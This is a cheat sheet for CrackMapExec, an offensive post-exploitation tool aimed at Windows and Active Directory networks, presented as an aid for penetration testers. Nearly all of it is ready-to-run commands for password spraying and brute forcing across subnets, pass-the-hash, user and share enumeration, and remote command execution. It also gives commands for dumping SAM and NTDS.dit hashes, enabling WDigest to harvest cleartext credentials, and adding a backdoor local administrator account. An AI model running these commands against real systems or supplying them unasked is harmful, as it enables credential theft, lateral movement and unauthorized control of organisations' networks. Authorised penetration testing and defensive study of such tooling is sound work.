CrackMapExec (CME)
CrackMapExec (CME) is an open-source post-exploitation tool that helps penetration testers perform network-level attacks and enumeration tasks against Windows environments. It is particularly useful for assessing large Active Directory (AD) networks, since every command below accepts a single host, a range, a CIDR block, or a file of targets.
Key Functionalities
- Enumerating Users and Groups
  Lists users, groups, and other AD objects
- Password Spraying
  Tests a single password against multiple user accounts
- Command Execution
  Executes commands remotely on target systems
- Dumping Hashes
  Extracts password hashes from remote systems
- Accessing Shares
  Lists and accesses SMB shares on remote systems
Target Formats
- One or more IP addresses:
  crackmapexec smb [IP-ADDRESS-1] [IP-ADDRESS-2]
- IP range:
  crackmapexec smb [IP-ADDRESS]-28 [IP-ADDRESS]-67
- CIDR notation:
  crackmapexec smb [IP-ADDRESS]/24
- Targets from file:
  crackmapexec smb targets.txt
Connect to Target Using Local Account
- Connect with a local account:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth
- Using a null session:
  crackmapexec smb [IP-ADDRESS] -u "" -p ""
Pass the Hash Against a Subnet
- Pass the hash with local auth:
  crackmapexec smb [IP-ADDRESS]/24 -u [USERNAME] -H '[LMHASH:NTHASH]' --local-auth
- Standard pass the hash:
  crackmapexec smb [IP-ADDRESS]/24 -u [USERNAME] -H '[NTHASH]'
Bruteforcing and Password Spraying
- Single password:
  crackmapexec smb [IP-ADDRESS]/24 -u "[USERNAME]" -p "[PASSWORD]"
- Multiple passwords:
  crackmapexec smb [IP-ADDRESS]/24 -u "[USERNAME]" -p "[PASSWORD1]" "[PASSWORD2]"
- Multiple users:
  crackmapexec smb [IP-ADDRESS]/24 -u "[USERNAME1]" "[USERNAME2]" -p "[PASSWORD]"
- Users and passwords from files:
  crackmapexec smb [IP-ADDRESS]/24 -u [USER_FILE] -p [PASS_FILE]
- Users from file, hashes from file:
  crackmapexec smb [IP-ADDRESS]/24 -u [USER_FILE] -H [NTLM_HASH_FILE]
User Enumeration
- Enumerate users:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --users
- Perform a RID bruteforce to get users:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --rid-brute
- Enumerate domain groups:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --groups
- Enumerate local users:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-users
Host Enumeration
- Generate a list of relayable hosts:
  crackmapexec smb [IP-ADDRESS]/24 --gen-relay-list output.txt
- Enumerate available shares:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth --shares
- Get the active sessions:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --sessions
- Check logged-in users:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --lusers
- Get the password policy:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --pass-pol
Command Execution Methods
- Execute a command through cmd.exe:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'whoami'
- Force the smbexec method:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'net user Administrator /domain' --exec-method smbexec
- Execute a command through PowerShell:
  crackmapexec smb [IP-ADDRESS] -u [USERNAME] -p '[PASSWORD]' -X 'whoami'
Getting Credentials
- Dump local SAM hashes:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth --sam
- Enable WDigest to get credentials from LSA memory:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth --wdigest enable
- Disable WDigest:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth --wdigest disable
- Query user sessions:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'quser'
- Force logoff:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'logoff [SESSIONID]'
- Dump the NTDS.dit from a DC using the secretsdump.py method:
  crackmapexec smb [IP-ADDRESS] -u [USERNAME] -p '[PASSWORD]' --ntds
- Use the Volume Shadow Copy Service to dump the NTDS.dit:
  crackmapexec smb [IP-ADDRESS] -u [USERNAME] -p '[PASSWORD]' --ntds vss
- Dump the NTDS.dit password history:
  crackmapexec smb [IP-ADDRESS]/24 -u [USERNAME] -p '[PASSWORD]' --ntds-history
Additional Features
- Upload a file to a remote share:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth --upload local_file.txt \\remote\share
- Download a file from a remote share:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth --download \\remote\share\remote_file.txt local_path
- Add a new user:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth -x "net user [NEW_USER] [new_pass] /add"
- Add a user to the local Administrators group:
  crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth -x "net localgroup administrators [NEW_USER] /add"